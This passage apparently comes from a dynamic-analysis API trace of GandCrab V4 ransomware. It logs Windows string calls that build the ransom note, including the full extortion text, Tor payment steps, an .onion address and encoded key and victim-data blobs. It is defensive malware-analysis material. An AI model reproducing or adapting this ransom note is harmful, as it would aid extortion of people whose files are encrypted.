lpString1="pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def") returned="pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def" [0041.053] lstrcatW (in: lpString1="pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def", lpString2="&" | out: lpString1="pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def&") returned="pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def&" [0041.053] VirtualFree (lpAddress=0x2f20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.053] lstrlenW (lpString="pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def&") returned 46 [0041.053] lstrlenW (lpString="ransom_id=") returned 10 [0041.053] lstrlenW (lpString="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 2934 [0041.053] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID} \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n") returned 1089 [0041.053] VirtualAlloc (lpAddress=0x0, dwSize=0x1f78, flAllocationType=0x3000, flProtect=0x4) returned 0x2f20000 [0041.054] lstrcpyW (in: lpString1=0x2f20000, lpString2="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID} \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n" | out: lpString1="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID} \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n") returned="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID} \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n" [0041.054] lstrcatW (in: lpString1="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID} \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n", lpString2="---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---" | out: lpString1="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID} \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID} \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---" [0041.054] lstrcpyW (in: lpString1=0x2f20536, lpString2="dce1bb8bd2ca4def" | out: lpString1="dce1bb8bd2ca4def") returned="dce1bb8bd2ca4def" [0041.054] 